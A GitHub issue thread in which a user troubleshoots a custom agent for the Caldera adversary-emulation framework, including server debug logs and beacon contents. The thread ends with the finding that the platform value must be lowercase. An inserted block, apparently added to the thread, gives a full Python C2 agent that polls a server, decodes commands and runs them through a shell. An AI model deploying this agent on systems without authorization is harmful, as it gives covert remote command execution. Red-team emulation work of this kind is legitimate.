
Custom agent, no instructions received

Open AndyCyberSec opened this issue 3 years ago • 4 comments

Hello, can someone explain the logic by which an agent receives instructions and runs operations? I know it's a generic question, but I followed the docs with no luck.

Below is pseudocode showing the logic I implemented following the docs; unfortunately it doesn't work this way. I receive a couple of instructions, then Caldera responds to the beacon with empty instructions although the operation is running.

import time

while True:
    response = send_beacon()                  # beacon JSON out, decoded reply in
    set_paw(response['paw'])

    for instruction in response['instructions']:
        out = run_command(instruction['command'])
        send_beacon(results=[{'id': instruction['id'], 'output': out}])  # report this link's result
        time.sleep(instruction['sleep'])

    time.sleep(response['sleep'])             # beacon sleep before the next check-in

If the agent is idle for a while waiting for commands and I then run an operation, I always receive empty instructions. If I run an operation just after starting the agent, I receive only the first instruction, then Caldera responds to the beacon with empty instructions.

Of course with the sandcat agent it works fine

Thanks

AndyCyberSec avatar Jun 25 '22 08:06 AndyCyberSec

Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/

github-actions[bot] avatar Jun 25 '22 08:06 github-actions[bot]

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

github-actions[bot] avatar Jul 16 '22 00:07 github-actions[bot]

Up

AndyCyberSec avatar Jul 16 '22 06:07 AndyCyberSec

@AndyCyberSec If you run the server with --log debug do you see messages like the following?

  • 'Incoming ____ beacon from ____'
  • 'Received result for link ____ from agent ____ via contact ____'
  • 'First time ____ beacon from ____'

What information is the agent sending in its beacon? Is it including platform and executors? And do the platform/executors match the abilities being sent to the agent?

clenk avatar Jul 22 '22 16:07 clenk

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

github-actions[bot] avatar Aug 12 '22 00:08 github-actions[bot]

@AndyCyberSec See question above.

mkultraWasHere avatar Aug 14 '22 22:08 mkultraWasHere

Thanks for the answer. I enabled debug logging and I can see those messages:

2022-08-23 17:32:04 - DEBUG (contact_svc.py:84 handle_heartbeat) First time HTTP beacon from dovcat
2022-08-23 17:32:04 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:32:04 - DEBUG (contact_svc.py:66 handle_heartbeat) Received result for link fb7eca77-8f51-4176-bad0-2dda4a20ee13 from agent dovcat via contact HTTP
2022-08-23 17:32:04 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:32:04 - DEBUG (client.py:111 write_http_request) > GET /link/completed HTTP/1.1
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: vSp0S8VkaHjbBPjPPzvrlw==
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:32:04 - DEBUG (client.py:111 write_http_request) > GET /link/status_changed HTTP/1.1
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: AHdLPfMt/jB7YLDJVhJgbA==
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: iOIHmxdplTq74TvOAQ9LqSbohwI=
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:32:04 GMT
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:32:04 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:32:04 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: bYCFeaCcv5siB97NwIzE9KvyFrc=
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:32:04 GMT
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:32:04 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:32:04 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:32:04 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:32:42 - DEBUG (auth_svc.py:125 login_redirect) Using login handler "Default Login Handler" for login redirect
2022-08-23 17:32:44 - DEBUG (auth_svc.py:100 login_user) Using login handler "Default Login Handler" for login
2022-08-23 17:32:44 - DEBUG (auth_svc.py:155 handle_successful_login) admin logging in
2022-08-23 17:32:55 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:33:21 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:33:21 - DEBUG (client.py:111 write_http_request) > GET /planner/bucket_transition HTTP/1.1
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: /F7foJePADqbf9pZa//6aQ==
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: zK7DErVc16tvkh7JkYQjfPtJuJs=
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:33:21 GMT
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:33:21 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:33:21 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:33:21 - DEBUG (planning_svc.py:179 get_links) Generated 0 usable links
2022-08-23 17:33:21 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:33:21 - DEBUG (client.py:111 write_http_request) > GET /planner/bucket_transition HTTP/1.1
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: K6k4Za38J2n8xik2XNV16g==
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: qrOUtLjoe9OeWMcL1tgXF8AyuPQ=
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:33:21 GMT
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:33:21 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:33:21 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:33:51 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:34:41 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:35:27 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:36:12 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:36:43 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:37:39 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:38:38 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:39:12 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:39:51 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat

Below is the agent view:

[+] Beacon (HTTP): ALIVE
[*] Running instruction fb7eca77-8f51-4176-bad0-2dda4a20ee13
[*] Submitting results for link fb7eca77-8f51-4176-bad0-2dda4a20ee13 via C2 channel HTTP
[*] Instruction sleep 0sec
[*] Beacon sleep 51sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 56sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 50sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 46sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 45sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}

And below is the Caldera view, where nothing happens when running ops:

https://dropover.cloud/469bd5#a65b6566-03bf-46d6-a926-09464583882c

The Op is running the standard "Check" adversary

AndyCyberSec avatar Aug 23 '22 15:08 AndyCyberSec

I think I have found the issue. The platform value sent within the beacon must be lowercase. In my case it was Darwin and did not work, using darwin seems to be working fine.

I hope it's lowercase for every platform value

AndyCyberSec avatar Aug 24 '22 15:08 AndyCyberSec
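The two points raised in this thread, clenk's question about whether the beacon's platform and executors match the abilities being sent, and the lowercase-platform finding above, come down to how a custom agent builds its beacon and handles the reply. The following is an added example, not code from Caldera, sandcat or this thread. The protocol details it encodes are assumptions to verify against your server version: the agent POSTs base64(JSON) to /beacon, the reply is base64(JSON) carrying `paw`, `sleep` and `instructions`, `instructions` is a JSON string holding a list of JSON strings, each instruction's `command` is base64-encoded, and results are reported with `id`, `output` (base64), `status` and `pid`. The `ability_is_runnable` check mirrors the exact-string platform/executor match that makes `Darwin` produce "Generated 0 usable links" while `darwin` works; `sample_reply` is a constructed server reply for offline use.

```python
"""Beacon, instruction and result handling for a custom Caldera agent (HTTP contact).

Added example; protocol layout is an assumption to verify against your server.
"""
import base64
import json
import os
import platform
import shlex
import subprocess
import time
import urllib.request


def normalize_platform(system_name: str) -> str:
    """platform.system() returns 'Darwin'/'Linux'/'Windows'; ability files are
    keyed on 'darwin'/'linux'/'windows', so lowercase before sending."""
    return system_name.strip().lower()


def build_beacon(paw: str, server: str, executors: list, results=None) -> dict:
    """Beacon with the same fields the thread's agent sends, platform and
    executor names normalized to lowercase."""
    return {
        "paw": paw, "server": server, "contact": "HTTP", "group": "red",
        "platform": normalize_platform(platform.system()),
        "architecture": platform.machine(),
        "executors": [e.lower() for e in executors],
        "host": platform.node(), "exe_name": "Python", "privilege": "User",
        "username": os.environ.get("USER") or os.environ.get("USERNAME", ""),
        "pid": os.getpid(), "ppid": os.getppid(),
        "results": results or [],
    }


def ability_is_runnable(ability_executors: list, beacon: dict) -> bool:
    """Client-side mirror of the planner's filter: an ability yields a link only
    if one of its executors has exactly the beacon's platform string and a name
    the agent advertised. 'Darwin' against 'darwin' yields no link."""
    return any(ex["platform"] == beacon["platform"] and ex["name"] in beacon["executors"]
               for ex in ability_executors)


def encode_beacon(beacon: dict) -> bytes:
    """Request body: base64 of the JSON beacon (assumed wire format)."""
    return base64.b64encode(json.dumps(beacon).encode())


def decode_response(body: bytes) -> dict:
    """Decode the base64(JSON) reply, unpack the nested instruction list and
    the base64 command inside each instruction (assumed wire format)."""
    reply = json.loads(base64.b64decode(body))
    raw = reply.get("instructions", "[]")
    items = json.loads(raw) if isinstance(raw, str) else raw
    instructions = []
    for item in items:
        ins = json.loads(item) if isinstance(item, str) else dict(item)
        ins["command"] = base64.b64decode(ins["command"]).decode()
        instructions.append(ins)
    reply["instructions"] = instructions
    return reply


def run_instruction(ins: dict) -> dict:
    """Run one instruction ('proc' as a bare argv, anything else via sh -c) and
    package the result for the next beacon; pid is the agent's own pid."""
    if ins.get("executor") == "proc":
        argv = shlex.split(ins["command"])
    else:
        argv = ["sh", "-c", ins["command"]]
    proc = subprocess.run(argv, capture_output=True, timeout=ins.get("timeout", 60))
    return {"id": ins["id"], "status": proc.returncode, "pid": os.getpid(),
            "output": base64.b64encode(proc.stdout + proc.stderr).decode()}


def beacon_loop(server: str, executors=("sh", "proc")) -> None:
    """Beacon, execute, report, sleep; results ride along on the next beacon."""
    paw, results = "", []
    while True:
        body = encode_beacon(build_beacon(paw, server, list(executors), results))
        req = urllib.request.Request(server + "/beacon", data=body)
        with urllib.request.urlopen(req, timeout=30) as resp:
            reply = decode_response(resp.read())
        paw, results = reply["paw"], []
        for ins in reply["instructions"]:
            results.append(run_instruction(ins))
            time.sleep(ins.get("sleep", 0))
        time.sleep(reply.get("sleep", 60))


def sample_reply(paw: str = "dovcat") -> bytes:
    """Constructed server reply (not captured from a real server) for offline use."""
    ins = {"id": "fb7eca77-8f51-4176-bad0-2dda4a20ee13", "sleep": 0, "timeout": 60,
           "executor": "sh", "command": base64.b64encode(b"whoami").decode()}
    reply = {"paw": paw, "sleep": 45, "watchdog": 0,
             "instructions": json.dumps([json.dumps(ins)])}
    return base64.b64encode(json.dumps(reply).encode())


if __name__ == "__main__":
    b = build_beacon("", "http://127.0.0.1:8888", ["sh", "proc"])
    print("beacon platform:", b["platform"], "executors:", b["executors"])
    for ins in decode_response(sample_reply())["instructions"]:
        print(run_instruction(ins))
```

Before pointing the loop at a live server, compare `build_beacon(...)["platform"]` and `["executors"]` against the `platform` and executor `name` values in the ability YAML you expect to run; `ability_is_runnable` gives the same yes/no the planner's "Generated N usable links" line reports.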

@AndyCyberSec reopen if you find the bug reoccurs

mkultraWasHere avatar Aug 30 '22 20:08 mkultraWasHere